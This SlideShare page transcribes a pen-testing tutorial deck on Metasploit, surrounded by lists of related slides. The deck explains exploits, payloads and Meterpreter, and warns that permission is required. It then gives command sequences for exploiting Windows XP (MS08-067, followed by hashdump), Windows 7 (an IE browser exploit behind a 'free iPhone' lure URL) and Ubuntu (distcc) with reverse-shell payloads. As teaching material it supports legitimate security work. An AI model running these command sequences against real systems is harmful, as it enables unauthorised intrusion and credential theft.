SlideShare a Scribd company logo

Pen-Testing with Metasploit

Mohammed Danish Amber
Mohammed Danish Amber

This document discusses penetration testing using the Metasploit framework. It provides an overview of Metasploit, describing it as an open-source platform for developing security tools and exploits. It also discusses key Metasploit components like exploits, payloads, and Meterpreter. The document demonstrates how to use Metasploit to perform penetration tests against Windows XP, Windows 7, and Ubuntu systems through examples of specific exploits.

1 of 29
Download to read offline
Pen-Testing With MetasploitBy -Mohammed Danish Amber
AGENDA ▪ Why & What's Pen-Testing ▪ About Metasploit ▪ Metasploit Basic & Meterpreter ▪ Demo
Mohammed Danish Amber ▪ Geek & Security Analyst ▪ Information Security Enthusiast ▪ Working in TCS ▪ Lecturer & Engineer ▪ Collaborative Project -Hacker Ecosystem ▪ Make Internet a Secure Place
Why Pen-Testing ▪ Millions of dollars have been invested in security programs to protect critical infrastructure to prevent data breaches ▪ Penetration Test is one of the most effective ways to identify weaknesses and deficiencies in these programs
What's Pen-Testing ▪ A method to evaluate the security of computer system / network ▪ Practice ( attacking ) an IT System like a ‘hacker’ does– Find security holes (weaknesses) – Bypass security mechanism– Compromise an organization’s IT system securityMUST HAVE PERMISSION FROM IT SYSTEM OWNERILLEGAL ACTIVITY CAN PUT YOU IN JAIL!
ETHICS ▪ THINK BEFORE YOU ACT ▪ DON'T BE STUPID ▪ DON'T BE MALICIOUS
PEN-TESTING PHASES INFORMATION GATHERING VULNERABILITY ANALYSIS EXPLOITATION POST EXPLOITATION REPORTING
Metasploit ▪ Not Just A Tool but an entire framework ▪ An Open Source platform for writing security tools and exploits ▪ Easily build attack vectors to add it's exploits, payloads, encoders. ▪ Create and execute more advanced attack ▪ Ruby based
Metsaploit Interface ▪ MSFconsole ▪ msfweb, msfgui (discontinued) ▪ Metasploit Pro & Community Edition ▪ Armitage
MSFconsole
MSFcli
Metasploit Terminology ▪ Exploit: Code that allow a pentester take some advantages of flaw within system,application, or service ▪ Payload: Code that we want the target system to execute (few commands to be executed on the target system) ▪ Shellcode: A set of instructions used as payload when exploitation occurs ▪ Module: A software that can be use by metasploit ▪ Listener: A component waiting for incoming connection
How does Exploitation works Attacker Sends: Exploit + PayloadUpload + download DATA Vulnerable Server Exploit run + Payload run
Meterpreter ▪ As a payload after vulnerability is exploited ▪ Improve the post exploitation
Meterpreter Exploiting a vulnerability Select a meterpreter as a payload Meterpreter shell
Metereperter Commands
Metereperter Commands
Metereperter Commands
Metereperter Commands
Metereperter Commands
Windows XP Exploitation ▪ msf > search windows/smb ▪ msf > info exploit/windows/smb/ms08_067_ netapi ▪ msf > use exploit/windows/smb/ms08_067_ netapi ▪ msf exploit(ms08_067_netapi) > show payloads ▪ msf exploit(ms08_067_netapi) > set PAYLOAD ▪ windows/meterpreter/reverse_tcp ▪ msf exploit(ms08_067_netapi) > show options ▪ msf exploit(ms08_067_netapi) > set RHOST <remote ip> ▪ msf exploit(ms08_067_netapi) > set LHOST <attacker ip> ▪ msf exploit(ms08_067_netapi) > show options ▪ msf exploit(ms08_067_netapi) > exploit ▪ meterpreter > background ▪ session -l
Windows XP Exploitation ▪ session -i 1 ▪ meterpreter > getsystem -h ▪ getuid ▪ hashdump
Windows 7 Exploitation ▪ msf > use exploit/windows/browser/ms11_003_ie_css_import ▪ msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp ▪ msf exploit(ms11_003_ie_css_import) > show options ▪ msf exploit(ms11_003_ie_css_import) > set SRVHOST <victim ip> ▪ msf exploit(ms11_003_ie_css_import) > set SRVPORT 80 ▪ msf exploit(ms11_003_ie_css_import) > set URIPATH free_iphone6plus.exe ▪ msf exploit(ms11_003_ie_css_import) > set LHOST <victim ip> ▪ msf exploit(ms11_003_ie_css_import) > set LPORT 443 ▪ msf exploit(ms11_003_ie_css_import) > exploitJust wait until the victim open url http://<ip>:80/free_iphon6plus.exe
Windows 7 Exploitation ▪ msf exploit(ms11_003_ie_css_import) > sessions -l ▪ msf exploit(ms11_003_ie_css_import) > sessions -i 1 ▪ meterpreter > sysinfo ▪ meterpreter > shell
Ubuntu Exploitation ▪ search distcc ▪ use exploit/unix/misc/distcc_exec ▪ show payloads ▪ set PAYLOAD cmd/unix/reverse ▪ show options ▪ set rhost <victim ip> ▪ set lhost <attacker ip>
Any Questions?
Thanks To ▪ Kali / BackTrack Linux ▪ Metasploit Team (HD Moore & rapid7) ▪ Offensive Security / Metasploit Unleashed ▪ David Kennedy ▪ Georgia Weidman ▪ Null Hyderabad Chapter -CORE TEAM ▪ #nullhyd @
WWW.MOHAMMEDDANISHAMBER.COM

Recommended

Metasploit framwork
Metasploit framworkMetasploit framwork
Metasploit framwork
Deepanshu Gajbhiye
 
Metasploit
MetasploitMetasploit
Metasploit
Institute of Information Security (IIS)
 
Finalppt metasploit
Finalppt metasploitFinalppt metasploit
Finalppt metasploitdevilback
 
Metasploit
MetasploitMetasploit
Metasploit
Lalith Sai
 
Introduction To Exploitation & Metasploit
Introduction To Exploitation & MetasploitIntroduction To Exploitation & Metasploit
Introduction To Exploitation & Metasploit
Raghav Bisht
 
Pentest with Metasploit
Pentest with MetasploitPentest with Metasploit
Pentest with Metasploit
M.Syarifudin, ST, OSCP, OSWP
 
Penetration testing using metasploit
Penetration testing using metasploitPenetration testing using metasploit
Penetration testing using metasploit
Aashish R
 
Metasploit framework in Network Security
Metasploit framework in Network SecurityMetasploit framework in Network Security
Metasploit framework in Network Security
Ashok Reddy Medikonda
 

Recommended

Metasploit framwork
Metasploit framworkMetasploit framwork
Metasploit framwork
Deepanshu Gajbhiye
 
Metasploit
MetasploitMetasploit
Metasploit
Institute of Information Security (IIS)
 
Finalppt metasploit
Finalppt metasploitFinalppt metasploit
Finalppt metasploitdevilback
 
Metasploit
MetasploitMetasploit
Metasploit
Lalith Sai
 
Introduction To Exploitation & Metasploit
Introduction To Exploitation & MetasploitIntroduction To Exploitation & Metasploit
Introduction To Exploitation & Metasploit
Raghav Bisht
 
Pentest with Metasploit
Pentest with MetasploitPentest with Metasploit
Pentest with Metasploit
M.Syarifudin, ST, OSCP, OSWP
 
Penetration testing using metasploit
Penetration testing using metasploitPenetration testing using metasploit
Penetration testing using metasploit
Aashish R
 
Metasploit framework in Network Security
Metasploit framework in Network SecurityMetasploit framework in Network Security
Metasploit framework in Network Security
Ashok Reddy Medikonda
 
Adversary Emulation using CALDERA
Adversary Emulation using CALDERAAdversary Emulation using CALDERA
Adversary Emulation using CALDERA
Erik Van Buggenhout
 
Introduction to Metasploit
Introduction to MetasploitIntroduction to Metasploit
Introduction to Metasploit
GTU
 
ETHICAL HACKING
ETHICAL HACKING ETHICAL HACKING
ETHICAL HACKING Sweta Leena Panda
 
Metaploit
MetaploitMetaploit
Metaploit
Ajinkya Pathak
 
Metasploit
MetasploitMetasploit
Metasploit
henelpj
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptx
DARSHANBHAVSAR14
 
Network security - Defense in Depth
Network security - Defense in DepthNetwork security - Defense in Depth
Network security - Defense in Depth
Dilum Bandara
 
Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...
Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...
Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...
Edureka!
 
MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0
Michael Gough
 
Metasploit
MetasploitMetasploit
Metasploit
Cristian Alejandro Rojas Quintero
 
Nmap basics
Nmap basicsNmap basics
Nmap basics
n|u - The Open Security Community
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
Niyas Nazar
 
SANS 20 Kritik Siber Guvenlik Kontrolü
SANS 20 Kritik Siber Guvenlik KontrolüSANS 20 Kritik Siber Guvenlik Kontrolü
SANS 20 Kritik Siber Guvenlik Kontrolü
Sparta Bilişim
 
Networking and penetration testing
Networking and penetration testingNetworking and penetration testing
Networking and penetration testing
Mohit Belwal
 
kill-chain-presentation-v3
kill-chain-presentation-v3kill-chain-presentation-v3
kill-chain-presentation-v3Shawn Croswell
 
Practical Malware Analysis: Ch 11: Malware Behavior
Practical Malware Analysis: Ch 11: Malware BehaviorPractical Malware Analysis: Ch 11: Malware Behavior
Practical Malware Analysis: Ch 11: Malware Behavior
Sam Bowne
 
Metasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With MetasploitMetasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With Metasploit
Anurag Srivastava
 
MITRE-Module 2 Slides.pdf
MITRE-Module 2 Slides.pdfMITRE-Module 2 Slides.pdf
MITRE-Module 2 Slides.pdf
ReZa AdineH
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
Sunny Neo
 
Introduction to Snort
Introduction to SnortIntroduction to Snort
Introduction to Snort
Hossein Yavari
 
Metasploit
MetasploitMetasploit
Metasploit
Raghunath G
 
Basic Metasploit
Basic MetasploitBasic Metasploit
Basic Metasploit
Muhammad Ridwan
 

More Related Content

What's hot

Adversary Emulation using CALDERA
Adversary Emulation using CALDERAAdversary Emulation using CALDERA
Adversary Emulation using CALDERA
Erik Van Buggenhout
 
Introduction to Metasploit
Introduction to MetasploitIntroduction to Metasploit
Introduction to Metasploit
GTU
 
Metaploit
MetaploitMetaploit
Metaploit
Ajinkya Pathak
 
Metasploit
MetasploitMetasploit
Metasploit
henelpj
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptx
DARSHANBHAVSAR14
 
Network security - Defense in Depth
Network security - Defense in DepthNetwork security - Defense in Depth
Network security - Defense in Depth
Dilum Bandara
 
Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...
Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...
Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...
Edureka!
 
MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0
Michael Gough
 
Metasploit
MetasploitMetasploit
Metasploit
Cristian Alejandro Rojas Quintero
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
Niyas Nazar
 
SANS 20 Kritik Siber Guvenlik Kontrolü
SANS 20 Kritik Siber Guvenlik KontrolüSANS 20 Kritik Siber Guvenlik Kontrolü
SANS 20 Kritik Siber Guvenlik Kontrolü
Sparta Bilişim
 
Networking and penetration testing
Networking and penetration testingNetworking and penetration testing
Networking and penetration testing
Mohit Belwal
 
kill-chain-presentation-v3
kill-chain-presentation-v3kill-chain-presentation-v3
kill-chain-presentation-v3Shawn Croswell
 
Practical Malware Analysis: Ch 11: Malware Behavior
Practical Malware Analysis: Ch 11: Malware BehaviorPractical Malware Analysis: Ch 11: Malware Behavior
Practical Malware Analysis: Ch 11: Malware Behavior
Sam Bowne
 
Metasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With MetasploitMetasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With Metasploit
Anurag Srivastava
 
MITRE-Module 2 Slides.pdf
MITRE-Module 2 Slides.pdfMITRE-Module 2 Slides.pdf
MITRE-Module 2 Slides.pdf
ReZa AdineH
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
Sunny Neo
 
Introduction to Snort
Introduction to SnortIntroduction to Snort
Introduction to Snort
Hossein Yavari
 

What's hot (20)

Adversary Emulation using CALDERA
Adversary Emulation using CALDERAAdversary Emulation using CALDERA
Adversary Emulation using CALDERA
 
Introduction to Metasploit
Introduction to MetasploitIntroduction to Metasploit
Introduction to Metasploit
 
ETHICAL HACKING
ETHICAL HACKING ETHICAL HACKING
ETHICAL HACKING
 
Metaploit
MetaploitMetaploit
Metaploit
 
Metasploit
MetasploitMetasploit
Metasploit
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptx
 
Network security - Defense in Depth
Network security - Defense in DepthNetwork security - Defense in Depth
Network security - Defense in Depth
 
Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...
Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...
Penetration Testing Tutorial | Penetration Testing Tools | Cyber Security Tra...
 
MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0
 
Metasploit
MetasploitMetasploit
Metasploit
 
Nmap basics
Nmap basicsNmap basics
Nmap basics
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
 
SANS 20 Kritik Siber Guvenlik Kontrolü
SANS 20 Kritik Siber Guvenlik KontrolüSANS 20 Kritik Siber Guvenlik Kontrolü
SANS 20 Kritik Siber Guvenlik Kontrolü
 
Networking and penetration testing
Networking and penetration testingNetworking and penetration testing
Networking and penetration testing
 
kill-chain-presentation-v3
kill-chain-presentation-v3kill-chain-presentation-v3
kill-chain-presentation-v3
 
Practical Malware Analysis: Ch 11: Malware Behavior
Practical Malware Analysis: Ch 11: Malware BehaviorPractical Malware Analysis: Ch 11: Malware Behavior
Practical Malware Analysis: Ch 11: Malware Behavior
 
Metasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With MetasploitMetasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With Metasploit
 
MITRE-Module 2 Slides.pdf
MITRE-Module 2 Slides.pdfMITRE-Module 2 Slides.pdf
MITRE-Module 2 Slides.pdf
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
 
Introduction to Snort
Introduction to SnortIntroduction to Snort
Introduction to Snort
 

Viewers also liked

Metasploit
MetasploitMetasploit
Metasploit
Raghunath G
 
Basic Metasploit
Basic MetasploitBasic Metasploit
Basic Metasploit
Muhammad Ridwan
 
Metasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassMetasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner Class
Georgia Weidman
 
44CON 2014 - Meterpreter Internals, OJ Reeves
44CON 2014 - Meterpreter Internals, OJ Reeves44CON 2014 - Meterpreter Internals, OJ Reeves
44CON 2014 - Meterpreter Internals, OJ Reeves
44CON
 
Denial Of Service Flooding Detection In Anonymity Networks
Denial Of Service Flooding Detection In Anonymity NetworksDenial Of Service Flooding Detection In Anonymity Networks
Denial Of Service Flooding Detection In Anonymity Networks
Jens Oberender
 
Meterpreter in Metasploit User Guide
Meterpreter in Metasploit User GuideMeterpreter in Metasploit User Guide
Meterpreter in Metasploit User Guide
Khairi Aiman
 
Ips and-ids
Ips and-idsIps and-ids
Ips and-ids
Adam Viet
 
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis44CON London 2015 - 15-Minute Linux Incident Response Live Analysis
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis
44CON
 
Messing around avs
Messing around avsMessing around avs
Messing around avs
Shubham Mittal
 
La Quadrature Du Cercle - The APTs That Weren't
La Quadrature Du Cercle - The APTs That Weren'tLa Quadrature Du Cercle - The APTs That Weren't
La Quadrature Du Cercle - The APTs That Weren't
pinkflawd
 
44CON London 2015 - How to drive a malware analyst crazy
44CON London 2015 - How to drive a malware analyst crazy44CON London 2015 - How to drive a malware analyst crazy
44CON London 2015 - How to drive a malware analyst crazy
44CON
 
Automated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit FrameworkAutomated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit Framework
Tom Eston
 
Post Exploitation Using Meterpreter
Post Exploitation Using MeterpreterPost Exploitation Using Meterpreter
Post Exploitation Using MeterpreterShubham Mittal
 
Metasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesMetasploit: Pwnage and Ponies
Metasploit: Pwnage and Ponies
Trowalts
 
Automated Penetration Testing With Core Impact
Automated Penetration Testing With Core ImpactAutomated Penetration Testing With Core Impact
Automated Penetration Testing With Core Impact
Tom Eston
 
The complex patient vad ransplant vad exchange or hospice
The complex patient vad ransplant vad exchange or hospiceThe complex patient vad ransplant vad exchange or hospice
The complex patient vad ransplant vad exchange or hospice
drucsamal
 
BSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama ElhamerBSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama ElhamerShellmates
 
Lab 20 active directory right managment services (ad rms)
Lab 20 active directory right managment services (ad rms) Lab 20 active directory right managment services (ad rms)
Lab 20 active directory right managment services (ad rms) Pham Viet Dung
 
Charlotte ISSA - 2016 - Mainframe Hacking
Charlotte ISSA - 2016 - Mainframe HackingCharlotte ISSA - 2016 - Mainframe Hacking
Charlotte ISSA - 2016 - Mainframe Hacking
Philip Young
 
Slide metaploit
Slide metaploitSlide metaploit
Slide metaploit
chungdv
 

Viewers also liked (20)

Metasploit
MetasploitMetasploit
Metasploit
 
Basic Metasploit
Basic MetasploitBasic Metasploit
Basic Metasploit
 
Metasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassMetasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner Class
 
44CON 2014 - Meterpreter Internals, OJ Reeves
44CON 2014 - Meterpreter Internals, OJ Reeves44CON 2014 - Meterpreter Internals, OJ Reeves
44CON 2014 - Meterpreter Internals, OJ Reeves
 
Denial Of Service Flooding Detection In Anonymity Networks
Denial Of Service Flooding Detection In Anonymity NetworksDenial Of Service Flooding Detection In Anonymity Networks
Denial Of Service Flooding Detection In Anonymity Networks
 
Meterpreter in Metasploit User Guide
Meterpreter in Metasploit User GuideMeterpreter in Metasploit User Guide
Meterpreter in Metasploit User Guide
 
Ips and-ids
Ips and-idsIps and-ids
Ips and-ids
 
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis44CON London 2015 - 15-Minute Linux Incident Response Live Analysis
44CON London 2015 - 15-Minute Linux Incident Response Live Analysis
 
Messing around avs
Messing around avsMessing around avs
Messing around avs
 
La Quadrature Du Cercle - The APTs That Weren't
La Quadrature Du Cercle - The APTs That Weren'tLa Quadrature Du Cercle - The APTs That Weren't
La Quadrature Du Cercle - The APTs That Weren't
 
44CON London 2015 - How to drive a malware analyst crazy
44CON London 2015 - How to drive a malware analyst crazy44CON London 2015 - How to drive a malware analyst crazy
44CON London 2015 - How to drive a malware analyst crazy
 
Automated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit FrameworkAutomated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit Framework
 
Post Exploitation Using Meterpreter
Post Exploitation Using MeterpreterPost Exploitation Using Meterpreter
Post Exploitation Using Meterpreter
 
Metasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesMetasploit: Pwnage and Ponies
Metasploit: Pwnage and Ponies
 
Automated Penetration Testing With Core Impact
Automated Penetration Testing With Core ImpactAutomated Penetration Testing With Core Impact
Automated Penetration Testing With Core Impact
 
The complex patient vad ransplant vad exchange or hospice
The complex patient vad ransplant vad exchange or hospiceThe complex patient vad ransplant vad exchange or hospice
The complex patient vad ransplant vad exchange or hospice
 
BSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama ElhamerBSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama Elhamer
 
Lab 20 active directory right managment services (ad rms)
Lab 20 active directory right managment services (ad rms) Lab 20 active directory right managment services (ad rms)
Lab 20 active directory right managment services (ad rms)
 
Charlotte ISSA - 2016 - Mainframe Hacking
Charlotte ISSA - 2016 - Mainframe HackingCharlotte ISSA - 2016 - Mainframe Hacking
Charlotte ISSA - 2016 - Mainframe Hacking
 
Slide metaploit
Slide metaploitSlide metaploit
Slide metaploit
 

Similar to Pen-Testing with Metasploit

iCrOSS 2013_Pentest
iCrOSS 2013_PentestiCrOSS 2013_Pentest
iCrOSS 2013_Pentest
M.Syarifudin, ST, OSCP, OSWP
 
Pentesting with linux
Pentesting with linuxPentesting with linux
Pentesting with linux
Hammad Ahmed Khawaja
 
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical Hacking
Raghav Bisht
 
RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombRIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob Holcomb
Priyanka Aash
 
Real life hacking101
Real life hacking101Real life hacking101
Real life hacking101
Florent Batard
 
Penetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection SystemPenetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection System
Bikrant Gautam
 
Metasploit
MetasploitMetasploit
Metasploit
Parth Sahu
 
Metasploit Computer security testing tool
Metasploit Computer security testing toolMetasploit Computer security testing tool
Metasploit Computer security testing tool
medoelkang600
 
Backtrack Manual Part8
Backtrack Manual Part8Backtrack Manual Part8
Backtrack Manual Part8
Nutan Kumar Panda
 
[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기
[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기
[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기
Ji-Woong Choi
 
Penetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityPenetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utility
IOSR Journals
 
White Lightning Sept 2014
White Lightning Sept 2014White Lightning Sept 2014
White Lightning Sept 2014
Bryce Kunz
 
Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenom
Siddharth Krishna Kumar
 
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOsSPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOsRod Soto
 
Automated prevention of ransomware with machine learning and gpos
Automated prevention of ransomware with machine learning and gposAutomated prevention of ransomware with machine learning and gpos
Automated prevention of ransomware with machine learning and gpos
Priyanka Aash
 
I got 99 trends and a # is all of them
I got 99 trends and a # is all of themI got 99 trends and a # is all of them
I got 99 trends and a # is all of them
Roberto Suggi Liverani
 
Metasploit Humla for Beginner
Metasploit Humla for BeginnerMetasploit Humla for Beginner
Metasploit Humla for Beginner
n|u - The Open Security Community
 
Metasploit seminar
Metasploit seminarMetasploit seminar
Metasploit seminar
henelpj
 
G3t R00t at IUT
G3t R00t at IUTG3t R00t at IUT
G3t R00t at IUT
Nahidul Kibria
 
Laboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testingLaboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testing
seastorm44
 

Similar to Pen-Testing with Metasploit (20)

iCrOSS 2013_Pentest
iCrOSS 2013_PentestiCrOSS 2013_Pentest
iCrOSS 2013_Pentest
 
Pentesting with linux
Pentesting with linuxPentesting with linux
Pentesting with linux
 
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical Hacking
 
RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob HolcombRIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob Holcomb
 
Real life hacking101
Real life hacking101Real life hacking101
Real life hacking101
 
Penetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection SystemPenetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection System
 
Metasploit
MetasploitMetasploit
Metasploit
 
Metasploit Computer security testing tool
Metasploit Computer security testing toolMetasploit Computer security testing tool
Metasploit Computer security testing tool
 
Backtrack Manual Part8
Backtrack Manual Part8Backtrack Manual Part8
Backtrack Manual Part8
 
[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기
[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기
[오픈소스컨설팅] 프로메테우스 모니터링 살펴보고 구성하기
 
Penetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityPenetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utility
 
White Lightning Sept 2014
White Lightning Sept 2014White Lightning Sept 2014
White Lightning Sept 2014
 
Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenom
 
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOsSPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
 
Automated prevention of ransomware with machine learning and gpos
Automated prevention of ransomware with machine learning and gposAutomated prevention of ransomware with machine learning and gpos
Automated prevention of ransomware with machine learning and gpos
 
I got 99 trends and a # is all of them
I got 99 trends and a # is all of themI got 99 trends and a # is all of them
I got 99 trends and a # is all of them
 
Metasploit Humla for Beginner
Metasploit Humla for BeginnerMetasploit Humla for Beginner
Metasploit Humla for Beginner
 
Metasploit seminar
Metasploit seminarMetasploit seminar
Metasploit seminar
 
G3t R00t at IUT
G3t R00t at IUTG3t R00t at IUT
G3t R00t at IUT
 
Laboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testingLaboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testing
 

Recently uploaded

Enhancing Project Management Efficiency_ Leveraging AI Tools like ChatGPT.pdf
Enhancing Project Management Efficiency_ Leveraging AI Tools like ChatGPT.pdfEnhancing Project Management Efficiency_ Leveraging AI Tools like ChatGPT.pdf
Enhancing Project Management Efficiency_ Leveraging AI Tools like ChatGPT.pdf
Jay Das
 
AI Pilot Review: The World’s First Virtual Assistant Marketing Suite
AI Pilot Review: The World’s First Virtual Assistant Marketing SuiteAI Pilot Review: The World’s First Virtual Assistant Marketing Suite
AI Pilot Review: The World’s First Virtual Assistant Marketing Suite
Google
 
Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...
Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...
Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...
Globus
 
Navigating the Metaverse: A Journey into Virtual Evolution"
Navigating the Metaverse: A Journey into Virtual Evolution"Navigating the Metaverse: A Journey into Virtual Evolution"
Navigating the Metaverse: A Journey into Virtual Evolution"
Donna Lenk
 
RISE with SAP and Journey to the Intelligent Enterprise
RISE with SAP and Journey to the Intelligent EnterpriseRISE with SAP and Journey to the Intelligent Enterprise
RISE with SAP and Journey to the Intelligent Enterprise
Srikant77
 
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdfDominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
AMB-Review
 
Paketo Buildpacks : la meilleure façon de construire des images OCI? DevopsDa...
Paketo Buildpacks : la meilleure façon de construire des images OCI? DevopsDa...Paketo Buildpacks : la meilleure façon de construire des images OCI? DevopsDa...
Paketo Buildpacks : la meilleure façon de construire des images OCI? DevopsDa...
Anthony Dahanne
 
Corporate Management | Session 3 of 3 | Tendenci AMS
Corporate Management | Session 3 of 3 | Tendenci AMSCorporate Management | Session 3 of 3 | Tendenci AMS
Corporate Management | Session 3 of 3 | Tendenci AMS
Tendenci - The Open Source AMS (Association Management Software)
 
GlobusWorld 2024 Opening Keynote session
GlobusWorld 2024 Opening Keynote sessionGlobusWorld 2024 Opening Keynote session
GlobusWorld 2024 Opening Keynote session
Globus
 
Globus Connect Server Deep Dive - GlobusWorld 2024
Globus Connect Server Deep Dive - GlobusWorld 2024Globus Connect Server Deep Dive - GlobusWorld 2024
Globus Connect Server Deep Dive - GlobusWorld 2024
Globus
 
2024 RoOUG Security model for the cloud.pptx
2024 RoOUG Security model for the cloud.pptx2024 RoOUG Security model for the cloud.pptx
2024 RoOUG Security model for the cloud.pptx
Georgi Kodinov
 
Custom Healthcare Software for Managing Chronic Conditions and Remote Patient...
Custom Healthcare Software for Managing Chronic Conditions and Remote Patient...Custom Healthcare Software for Managing Chronic Conditions and Remote Patient...
Custom Healthcare Software for Managing Chronic Conditions and Remote Patient...
Mind IT Systems
 
Cyaniclab : Software Development Agency Portfolio.pdf
Cyaniclab : Software Development Agency Portfolio.pdfCyaniclab : Software Development Agency Portfolio.pdf
